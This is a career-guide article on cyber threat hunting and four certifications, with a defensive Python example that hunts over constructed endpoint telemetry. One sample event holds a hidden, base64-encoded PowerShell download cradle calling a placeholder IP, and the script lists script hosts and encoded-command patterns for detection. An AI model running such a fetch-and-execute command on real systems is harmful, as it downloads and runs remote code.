Heard of cyber threat hunting but not sure exactly what it is and why it is important? It is perhaps one of the most cutting-edge areas within information security right now. Let's talk about what cyber threat hunting is and take a look at what we think are the best certifications to propel your career in this area.
Cyber threat hunting is the practice of proactively searching for, and neutralizing, threats that have already slipped past traditional, alert-driven security controls. Unlike penetration testing, which simulates an attacker, threat hunting is performed in real time against the production environment, looking for real adversaries. Effective threat hunting requires in-depth knowledge of how the environment normally behaves and the skill to interpret deviations from that baseline. Threat hunters carefully analyze the environment, looking for suspicious activity or malicious behavior, using one or more of three broad approaches: 1) the hypothesis-based approach, in which the hunter posits how an adversary might operate in the environment and queries the data to confirm or refute it; 2) the known-indicators approach, in which the hunter sweeps telemetry for indicators of compromise (IOCs) such as file hashes, IP addresses and domains obtained from threat intelligence; and 3) the machine learning approach, in which anomaly detection or clustering surfaces outliers for the hunter to investigate.

The success of threat hunting depends heavily on the hunter's knowledge and skills. A good threat hunter knows how to combine these approaches with suitable data acquisition methods and then analyze the collected data. Monitoring data typically comes from firewalls, Intrusion Detection Systems (IDSs), Data Loss Prevention (DLP) tools, endpoint and server logs, and similar sources, and is collected and analyzed with SIEM (Security Information and Event Management) and analytics tools. An experienced threat hunter knows how to use these tools and data analysis solutions.

Various certification bodies and organizations offer cyber threat hunting certifications that attest to a professional's threat hunting knowledge and expertise. The following is a brief overview of the most popular cyber threat hunting certifications recognized by organizations looking for expert cyber threat hunters.
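To make the difference between the known-indicators and hypothesis-based approaches concrete, here is a small hunting pass written for this article; it is an added example, not code from any of the certification bodies discussed below. It runs both approaches over a handful of constructed process-creation events: an IOC sweep for a placeholder hash, IP address and domain, and two behavioural hypotheses ("Office applications should never launch a script host" and "encoded PowerShell is rare enough to review every instance") that catch the malicious chain even when none of its artefacts appear in the indicator set. Every event, hash, hostname and 203.0.113.x address is invented for the example.

```python
"""Added example: a tiny hunting pass over constructed endpoint telemetry.
Known-indicator hunting matches each event against an IOC set; the
hypothesis-based hunts test behaviour that no indicator would catch.
All events, hashes, domains and IPs are constructed, and the IOC set is
a placeholder for a real threat intelligence feed.
"""
import base64
import json
import re


def encode_powershell(command: str) -> str:
    """PowerShell's -EncodedCommand takes base64 of the UTF-16LE command text."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# The one malicious chain in the sample: a macro document launches an
# encoded PowerShell download cradle (constructed, not a real sample).
SAMPLE_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.45/a')"

SAMPLE_EVENTS = [  # JSON lines, loosely shaped like Sysmon process-creation events
    json.dumps({"id": 1, "host": "ws01", "parent": "explorer.exe", "image": "winword.exe",
                "cmdline": "winword.exe C:\\Users\\bob\\invoice.docm", "sha256": "11" * 32, "dest": ""}),
    json.dumps({"id": 2, "host": "ws01", "parent": "winword.exe", "image": "powershell.exe",
                "cmdline": "powershell.exe -nop -w hidden -EncodedCommand " + encode_powershell(SAMPLE_CRADLE),
                "sha256": "22" * 32, "dest": "203.0.113.45:80"}),
    json.dumps({"id": 3, "host": "ws02", "parent": "explorer.exe", "image": "svcupdate.exe",
                "cmdline": "svcupdate.exe /silent", "sha256": "ab" * 32, "dest": "update-check.example.net:443"}),
    json.dumps({"id": 4, "host": "ws03", "parent": "services.exe", "image": "svchost.exe",
                "cmdline": "svchost.exe -k netsvcs", "sha256": "44" * 32, "dest": ""}),
    json.dumps({"id": 5, "host": "ws02", "parent": "explorer.exe", "image": "powershell.exe",
                "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1", "sha256": "22" * 32, "dest": ""}),
]

# Placeholder indicators (hypothetical values standing in for a TI feed).
IOCS = {
    "sha256": {"ab" * 32},
    "ip": {"203.0.113.45"},
    "domain": {"update-check.example.net"},
}

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def parse_events(lines):
    """Parse JSON-lines telemetry, skipping malformed records rather than aborting the hunt."""
    events = []
    for line in lines:
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def hunt_indicators(events, iocs):
    """Known-indicator approach: flag any event touching a listed hash, IP or domain."""
    hits = []
    for ev in events:
        if ev.get("sha256") in iocs["sha256"]:
            hits.append((ev["id"], "sha256", ev["sha256"]))
        dest = ev.get("dest") or ""
        peer = dest.rsplit(":", 1)[0]  # strip the port (IPv4 or hostname only in this sample)
        for kind in ("ip", "domain"):
            if peer and peer in iocs[kind]:
                hits.append((ev["id"], kind, peer))
    return hits


def hunt_office_spawning_script_host(events):
    """Hypothesis: Office applications have no business launching script hosts."""
    return [ev["id"] for ev in events
            if ev.get("parent", "").lower() in OFFICE_APPS
            and ev.get("image", "").lower() in SCRIPT_HOSTS]


def decode_encoded_powershell(cmdline):
    """Return the plaintext of a -EncodedCommand argument, or None if there is none."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt_encoded_powershell(events):
    """Hypothesis: encoded PowerShell is rare enough here that every instance deserves review."""
    findings = []
    for ev in events:
        decoded = decode_encoded_powershell(ev.get("cmdline", ""))
        if decoded is not None:
            findings.append((ev["id"], decoded))
    return findings


def run_hunt(lines=SAMPLE_EVENTS, iocs=IOCS):
    """Run both approaches over the telemetry and return findings keyed by hunt name."""
    events = parse_events(lines)
    return {
        "ioc_hits": hunt_indicators(events, iocs),
        "office_spawns_script": hunt_office_spawning_script_host(events),
        "encoded_powershell": hunt_encoded_powershell(events),
    }


if __name__ == "__main__":
    for name, findings in run_hunt().items():
        print(f"{name}: {findings}")
```

Note what each approach does and does not see: the IOC sweep flags event 2 only because its destination IP happens to be in the feed, and would miss it entirely if the attacker rotated infrastructure, whereas the parent/child and encoded-command hypotheses flag the same event from its behaviour alone and leave the legitimate backup script (event 5, also PowerShell) untouched. In a real hunt the hypotheses would be run against a SIEM or EDR query rather than a Python list, but the logic is the same.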
1) Certified Threat Intelligence Analyst (CTIA)
CTIA is a 3-day training and certification program offered by EC-Council. Its content was designed with input from prominent threat intelligence experts. CTIA validates an individual's ability to design a proactive, iterative threat intelligence program that helps an organization gather evidence-based knowledge and act against both known and unknown cyber threats. CTIA holders can strengthen an organization's predictive capabilities and its proactive measures against emerging threats.
CTIA is an advanced-level certification that assumes a good understanding of the cyber-security domain. It is designed for the following experienced cyber-security professionals.
- Ethical hackers
- Threat intelligence analysts
- Threat hunters
- Digital forensic experts
- SOC professionals
- Information security experts
- Security architects
- Security managers
CTIA Exam Format
The CTIA exam follows this format.
Exam Availability: EC-Council Portal
Total Questions: 50
Exam Format: Multiple Choice Questions
Exam Duration: 2 Hours
Passing Score: 70%
Candidates must either attend official CTIA training or, if they skip the training, apply for exam eligibility with at least two years of working experience in the information security domain.
CTIA Knowledge Domains
The following six domains are covered in the current (v1) CTIA exam format.
1) Introduction to Threat Intelligence: This domain carries 14% of the CTIA exam. The important topics (subdomains) covered in this domain are:
- Understanding threat intelligence
- Threat intelligence lifecycle overview
- Threat intelligence frameworks overview
2) Cyber Threats and Kill Chain Methodologies: This domain contributes 14% of the CTIA exam and comprises the following subdomains.
- Cyber threats
- Advanced persistent threats
- Cyber kill chain
- Indicators of compromise
3) Requirements, Direction, Planning, and Overview: 16% of the questions in the CTIA exam are taken from this domain. It covers the following:
- Understanding current landscape
- Understanding requirements
- Planning threat intelligence program
- Establishing support
- Building team
- Reviewing threat intelligence program
4) Data Collection and Processing: This domain has the highest exam weighting, 24%. Its important subdomains are:
- Threat intelligence data collection overview
- Understanding data collection and acquisition
- Understanding data processing and exploitation
5) Data Analysis: The fifth domain contributes 18% of the CTIA exam, drawn from the following subdomains.
- Data analysis overview
- Threat analysis overview
- Data analysis techniques
- Threat intelligence tools overview
6) Dissemination and Reporting of Intelligence: The sixth domain contributes 14% of the exam, with the following subdomains.
- Understanding dissemination
- Threat intelligence reports overview
- Threat intelligence sharing overview
- Delivery mechanisms overview
- Threat intelligence integration
- Intelligence sharing regulations and acts
CTIA reference Page: https://www.eccouncil.org/programs/certified-threat-intelligence-analyst-ctia/
2) GIAC Cyber Threat Intelligence (GCTI)
The GCTI certification covers not only the basics of cyber threat intelligence but also the strategic and operational expertise expected of analysts and threat hunters. GCTI-certified professionals are considered competent in open source intelligence (tools and strategies), information gathering, and data analysis.
The following security professionals are encouraged to pursue GCTI certification.
- Threat hunters
- Incident response teams
- SOC members
- Digital forensic experts
- Information security professionals
GCTI Exam Format
GCTI is a proctored exam delivered through Pearson VUE and must be scheduled online in advance. The current exam has the following format.
Exam Type: Proctored
Total Exam Questions: 75
Allotted Time: 2 Hours
Passing Score: 71%
GCTI Knowledge Domains
Candidates for GCTI certification must prepare for the following exam topics. GIAC-affiliated training is also available to cover these topics in detail.
- Intelligence Analysis
- Intelligence Basics
- Intelligence Applications Knowledge
- Attribution and Campaigns
- Data Collection and Storage
- Kill chain
- Diamond model
- Malware analysis tools and techniques
- Intelligence sharing
GCTI reference page: https://www.giac.org/certification/cyber-threat-intelligence-gcti
3) Certified Cyber Threat Hunting Professional (CCTHP)
CCTHP is owned by the Information Assurance Certification Review Board (IACRB), a not-for-profit entity that offers a number of Information Assurance (IA) certifications. CCTHP certifies a professional's knowledge and skill in identifying and hunting cyber threats.
CCTHP is well regarded by organizations across the IT industry. Those pursuing a threat hunting career can use the CCTHP credential as proof of their cyber threat knowledge and hunting capabilities.
CCTHP Exam Format
CCTHP has the following exam format. The exam can be scheduled at any IACRB partner location, taken over the internet by employees of approved organizations, or proctored on site at a location of choice for a group of ten or more candidates.
Total Exam Questions: 50
Questions Format: Multiple Choice Questions
Exam Duration: 2 Hours
Passing Marks: 70%
CCTHP Knowledge Domains
Candidates for the CCTHP exam must demonstrate expertise in the following five domains defined by the CCTHP body of knowledge.
- Cyber threat hunting – definitions and goals
- Methodologies and techniques used in cyber threat hunting
- Technologies and tools used in cyber threat hunting
- Network-based cyber threats hunting
- Host-based cyber threat hunting
CCTHP certification is valid for four years. To recertify, holders retake whichever version of the CCTHP exam is current at that time; no additional fee is charged for recertification.
CCTHP reference page: http://www.iacertification.org/ccthp_certified_cyber_threat_hunting_professional.html
4) eLearnSecurity’s Certified Threat Hunting Professional (eCTHP)
eLearnSecurity is a project of Caendra Inc., a Silicon Valley-based company that provides IT security training and certification programs. The eCTHP certification evaluates a candidate's threat hunting skills and defensive strategy, and is aimed at the following professionals.
- Cyber threat hunters
- Information security practitioners
- Security Operations Center (SOC) specialists
- IT security professionals
eCTHP Exam Format
The eCTHP exam format is quite different from those above: eLearnSecurity assesses candidates through a hands-on practical exam in a virtual lab. Candidates must hunt for threats in a corporate network built solely to test their threat hunting skills and defensive strategy. A reliable internet connection and a VPN client are required to take the exam from home or the office. eLearnSecurity also offers a training course to prepare for the exam.
eCTHP Knowledge Domains
eLearnSecurity assesses candidates' threat hunting skills in the following areas.
- Network traffic analysis
- Data correlation
- Knowledge of data analysis tools
- Data enrichment
- Memory forensics
- Windows and Linux event analysis
- Log analysis
- IOC-based threat hunting
- Cyber Kill Chain
eCTHP reference page: https://www.elearnsecurity.com/certification/ecthp/